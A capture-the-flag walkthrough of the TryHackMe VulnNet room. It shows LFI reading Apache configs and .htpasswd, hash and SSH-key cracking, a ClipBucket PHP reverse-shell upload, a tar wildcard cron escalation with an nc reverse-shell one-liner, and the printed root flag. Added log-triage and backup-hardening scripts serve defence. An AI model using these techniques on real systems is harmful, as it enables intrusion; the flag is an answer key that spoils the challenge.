# TryHackMe - Vulnet Writeup

###### tags: `writeup` `tryhackme` `vulnet` `medium`

## :computer: Port Scanning

```bash=1
nmap -sC -sV -v -p- -T4 -oN Ports 10.10.124.152
```

![Nmap Results](https://i.imgur.com/qR9fPMs.png)

There are two open ports:

* Port 22: the default port for Secure Shell, an encrypted remote access protocol. The service is **OpenSSH** version **7.6p1**.
* Port 80: the default HTTP port. The web server is **Apache httpd 2.4.29**.

## :eye: Enumeration

### Fuzzing HTTP Service

Since HTTP is the only service we can work with, we fuzz the site for interesting directories while we review the page. I use ffuf here because it is written in Go, which makes the fuzzing much faster.

```bash=
ffuf -u "http://vulnnet.thm/FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -fc 404 -t 50
```

#### Ffuf Explanation

* The **-u** flag sets the URL of the page to fuzz.
* The **-w** flag sets the wordlist used for fuzzing.
* The **-fc** flag filters out responses with the status codes you specify.
* The **-t** flag sets the number of threads that fuzz at the same time. I use 50 for CTFs; higher values such as 100 or 150 can produce false responses.
```console
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://vulnnet.thm/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response status: 404
________________________________________________

# directory-list-2.3-medium.txt [Status: 200, Size: 5829, Words: 1689, Lines: 142]
img                     [Status: 301, Size: 308, Words: 20, Lines: 10]
#                       [Status: 200, Size: 5829, Words: 1689, Lines: 142]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
fonts                   [Status: 301, Size: 310, Words: 20, Lines: 10]
                        [Status: 200, Size: 5829, Words: 1689, Lines: 142]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220560/220560] :: Job [1/1] :: 795 req/sec :: Duration: [0:05:07] :: Errors: 0 ::
```

### :card_index_dividers: Subdirectory Enumeration

The js subdirectory looks interesting: inside it there are two obfuscated JavaScript files.

![](https://i.imgur.com/vszBFwa.png)

![](https://i.imgur.com/CcbPRD2.png)

## :bomb: Exploitation

### JavaScript Deobfuscation

:::info
To deobfuscate JavaScript files we can use a web tool like [this one](https://deobfuscate.io/).
:::

If we read the first JavaScript file we can see this parameter:

```javascript=
return n.d(t, "a", t), t;
},
n.o = function (e, t) {
  return Object.prototype.hasOwnProperty.call(e, t);
},
n.p = "http://vulnnet.thm/index.php?referer=",
n(n.s = 0);
}({0: function (e, t, n)
```

In the second JavaScript file we can see a subdomain:

```javascript=
t.o = function (a, e) {
  return Object.prototype.hasOwnProperty.call(a, e);
},
t.p = "http://broadcast.vulnnet.thm",
t(t.s = 0);
}({0: function (a, e, t) {
  a.exports = t("WdQY");
}, WdQY: function (a, e, t) {
  "use strict";
```

Now we know there is an LFI in the `referer` parameter and a second application on that subdomain, so let's look inside it. To reach the subdomain we have to add it to /etc/hosts:

```bash=
echo "10.10.32.192 broadcast.vulnnet.thm" >> /etc/hosts
```

When you browse to the subdomain it asks for a password:

![](https://i.imgur.com/AKWelq8.png)

To find the credentials we have to locate the .htpasswd file for broadcast.vulnnet.thm. Since the server is Apache, we look at the default site configuration in the apache2 configuration folder:

> /etc/apache2/sites-enabled/000-default.conf

To read the file we use the LFI and view the page source, so the link looks like this:

> view-source:http://vulnnet.thm/?referer=/etc/apache2/sites-enabled/000-default.conf

![](https://i.imgur.com/Jql6vNE.png)

As you can see, the configuration reveals the path of .htpasswd:

> /etc/apache2/.htpasswd

Following the same method we find a user and a hashed password:

```bash=1
developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0
```

### :lock: Cracking password hashes with John

Write the hash into a file with this command (the single quotes keep the shell from expanding the `$` parts as variables):

```bash=
echo '$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0' > hash
```

Now we use John: go to the directory with the hash file and start it.

```console
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```

We now use the cracked password to log in to the subdomain.
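From the defender's side, both the directory brute force in the Enumeration section and the `referer=` probing of Apache configuration files above leave distinctive traces in the web server's access log. The following shell script is an added example and not part of the original writeup: it runs two checks over a constructed sample of Apache combined-format log lines (the client addresses and timestamps are made up). `count_404_clients` reports clients that pile up 404 responses, the footprint of a wordlist scan, and `flag_lfi_requests` reports requests whose query string assigns a parameter an absolute path or a traversal sequence.

```shell
#!/bin/sh
# Added example (not from the original writeup): triage Apache access-log
# lines for the two activities described above, a directory brute force
# with a wordlist and LFI probing through a query parameter.
# SAMPLE_LOG is constructed; the client addresses in it are fictional.

SAMPLE_LOG='10.10.14.5 - - [02/Sep/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5829 "-" "Mozilla/5.0"
10.10.14.5 - - [02/Sep/2021:10:00:02 +0000] "GET /admin HTTP/1.1" 404 276 "-" "Fuzz Faster U Fool v1.3.1"
10.10.14.5 - - [02/Sep/2021:10:00:02 +0000] "GET /backup HTTP/1.1" 404 276 "-" "Fuzz Faster U Fool v1.3.1"
10.10.14.5 - - [02/Sep/2021:10:00:02 +0000] "GET /login HTTP/1.1" 404 276 "-" "Fuzz Faster U Fool v1.3.1"
10.10.14.5 - - [02/Sep/2021:10:00:03 +0000] "GET /js HTTP/1.1" 301 307 "-" "Fuzz Faster U Fool v1.3.1"
10.10.14.9 - - [02/Sep/2021:10:00:04 +0000] "GET /css/style.css HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.10.14.9 - - [02/Sep/2021:10:00:05 +0000] "GET /missing.png HTTP/1.1" 404 276 "-" "Mozilla/5.0"
10.10.14.5 - - [02/Sep/2021:10:01:00 +0000] "GET /index.php?referer=/etc/apache2/sites-enabled/000-default.conf HTTP/1.1" 200 1472 "-" "Mozilla/5.0"
10.10.14.5 - - [02/Sep/2021:10:01:05 +0000] "GET /index.php?referer=../../../../etc/apache2/.htpasswd HTTP/1.1" 200 212 "-" "Mozilla/5.0"
10.10.14.9 - - [02/Sep/2021:10:01:10 +0000] "GET /index.php?referer=news.php HTTP/1.1" 200 5829 "-" "Mozilla/5.0"'

# count_404_clients THRESHOLD: read log lines on stdin and print "ip count"
# for every client whose 404 responses reach THRESHOLD. In the combined log
# format the client is field 1 and the status code is field 9. One client
# piling up 404s within seconds is what a wordlist scan looks like.
count_404_clients() {
    awk -v min="$1" '$9 == 404 { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= min) print ip, hits[ip] }'
}

# flag_lfi_requests: read log lines on stdin and print "ip request" for every
# request whose query string gives a parameter an absolute path ("=/") or a
# traversal sequence ("=../"), the shape of the referer= probing above.
# Field 7 is the request path including the query string.
flag_lfi_requests() {
    awk '$7 ~ /\?[^ ]*=(\/|\.\.\/)/ { print $1, $7 }'
}

# triage THRESHOLD: run both checks over the log lines on stdin and print a
# short report. The input is buffered once so both checks see all of it.
triage() {
    data="$(cat)"
    echo "== clients with at least $1 responses of 404 =="
    printf '%s\n' "$data" | count_404_clients "$1"
    echo "== requests whose query values look like file paths =="
    printf '%s\n' "$data" | flag_lfi_requests
}

# Usage on the constructed sample:
#   printf '%s\n' "$SAMPLE_LOG" | triage 3
# Usage on a real log (Debian/Ubuntu default path assumed):
#   triage 20 < /var/log/apache2/access.log
```

The threshold is a tuning knob: a scan like the one above produces hundreds of thousands of requests in a few minutes, so even a high value catches it, while the path check has no threshold because a single successful read of a configuration file is already worth an alert.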
developers : (crackedpasswd)

### Inside the Subdomain

When you enter the site you can see it is a ClipBucket installation, and if you view the source code you can find its version.

![](https://i.imgur.com/JFUIGDu.png)

Searching [exploit-db](https://www.exploit-db.com/) you can find the [exploit](https://www.exploit-db.com/exploits/44250).

![](https://i.imgur.com/8D056TK.png)

This exploit allows uploading files to ClipBucket, so we prepare a PHP reverse shell. On Kali you can copy it from:

> /usr/share/webshells/php/php-reverse-shell.php

Copy the webshell to your working directory and edit it with nano to set your VPN IP and your listening port. It looks like this:

![](https://i.imgur.com/jvMZgzC.png)

### Uploading the webshell to ClipBucket

Following the exploit, go to the folder with the edited webshell, rename it to anyname.php and upload it:

```bash
curl -F "file=@anyname.php" -F "plupload=1" -F "name=anyname.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<passwd>
```

![](https://i.imgur.com/XbhCJPw.png)

Before you trigger the webshell, start a listener:

```bash=
nc -nlvp 1234
```

Then trigger the webshell by browsing to the uploaded file under /files; the path looks like this:

> http://broadcast.vulnnet.thm/files/photos/2021/09/02/16306000813aa88a.php

And PWN! We have a reverse shell, but as the www-data user.

![](https://i.imgur.com/iFI8kiG.png)

If you noticed, I wrote rlwrap before the nc command. This tool gives the shell more interactivity, but it does not always work, so we still have to upgrade to a TTY.

---

### Privesc to User

If you look into the /var/backups directory you will find the ssh-backup.tar.gz file.
To extract it use:

> tar xvf ssh-backup.tar.gz

Inside you get an encrypted private key. It can be cracked with John, but first it has to be converted into a crackable format with ssh2john.py:

```console
python /usr/share/john/ssh2john.py id_rsa > crack
```

After this you should obtain something like this:

![](https://i.imgur.com/OIGAngI.png)

Now you can crack the file with John too, using the same command as before but with the new file:

> john crack --wordlist=/usr/share/wordlists/rockyou.txt

Once the crack finishes you obtain the passphrase and can log in over SSH with the encrypted private key:

> ssh -i id_rsa server-management@10.10.43.115

Go to the $HOME of server-management and cat the **User Flag**.

![](https://i.imgur.com/AyECmyW.png)

---

### Root Privesc

To escalate to root I used a Spanish tool called [linpeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). With linpeas I enumerated most of the possible privesc paths and found something interesting in cron.

![](https://i.imgur.com/grSzOxS.png)

Let's look into **backupsrv.sh**:

![](https://i.imgur.com/LJH0n9f.png)

Now we can see there is a wildcard vulnerability here: whenever tar is run with a wildcard, we can create files whose names are interpreted as tar options, and those options can execute a command. More info [here](https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks).

Create a script named shell.sh inside /home/server-management/Documents that contains this:

```bash=
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
```

After creating the script, run these commands in the same directory:

> echo > '--checkpoint=1'
> echo > '--checkpoint-action=exec=sh shell.sh'

Start a netcat listener and wait a few seconds to receive the root shell.
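For the defender, the fix to a backup job like this one is to stop letting the shell expand `*` into file names that tar then parses as options. The script below is an added example, not the room's backupsrv.sh: `safe_backup` archives a directory with `-C dir -- .` so no file name is ever passed to tar as an argument, and `audit_tar_wildcard` greps a script for tar invocations that still pass a bare `*`. The `demo` function plants decoy names of the kind described above in a scratch directory, archives it the safe way and confirms that nothing was executed. All paths and script names in it are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original writeup): a hardened replacement for
# a cron backup that runs "tar ... *", plus an audit check that finds such
# invocations in scripts. Paths and script names here are hypothetical.

# safe_backup SRC_DIR DEST_TGZ: archive SRC_DIR without letting file names
# reach tar as options. "-C" enters the directory and "." names it, so the
# shell never expands a wildcard into entries such as "--checkpoint=1";
# "--" ends option parsing as a second guard.
safe_backup() {
    tar -czf "$2" -C "$1" -- .
}

# audit_tar_wildcard SCRIPT: print "line:text" for every tar invocation in
# SCRIPT that passes a bare "*" (or "dir/*") as an argument. Exit status is
# 0 when something was found, 1 when the script is clean (grep semantics).
audit_tar_wildcard() {
    grep -nE '(^|[;&| ])tar [^#]*[ /]\*([ ;&|]|$)' "$1"
}

# demo: build a scratch directory holding the kind of decoy names the
# wildcard trick relies on, archive it with safe_backup and report whether
# the planted action ran (it must not) and which entries were stored.
# The planted command is "touch action-ran", relative to the directory
# tar enters with -C, so a marker file there would mean it executed.
demo() {
    d="$(mktemp -d)"
    marker="$d/action-ran"
    printf 'data\n' > "$d/notes.txt"
    : > "$d/--checkpoint=1"
    : > "$d/--checkpoint-action=exec=touch action-ran"
    safe_backup "$d" "$d.tgz"
    if [ -e "$marker" ]; then
        echo "FAIL: a file name was interpreted as a tar option"
        rm -rf "$d" "$d.tgz"
        return 1
    fi
    echo "OK: no action executed; archived entries:"
    tar -tzf "$d.tgz"
    rm -rf "$d" "$d.tgz"
}

# Usage:
#   demo
#   audit_tar_wildcard /etc/cron.daily/some-backup-script
```

On a real system, run `audit_tar_wildcard` over every script referenced from crontabs and `/etc/cron.*`; any hit that runs as root from a directory a less privileged user can write to is the exact condition the writeup exploits.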
```bash=
cat /root/root.txt
THM{220b671dd8adc301b34c2738ee8295ba}
```

### You can find me on:

:bird: [**Twitter**](https://twitter.com/Aka_Mecanico)
:desktop_computer: [**Github**](https://github.com/Mec4nico)
:ballot_box_with_check: [**TryHackMe**](https://tryhackme.com/p/mech4nico)
:green_book: [**HackTheBox**](https://www.hackthebox.eu/home/users/profile/336092)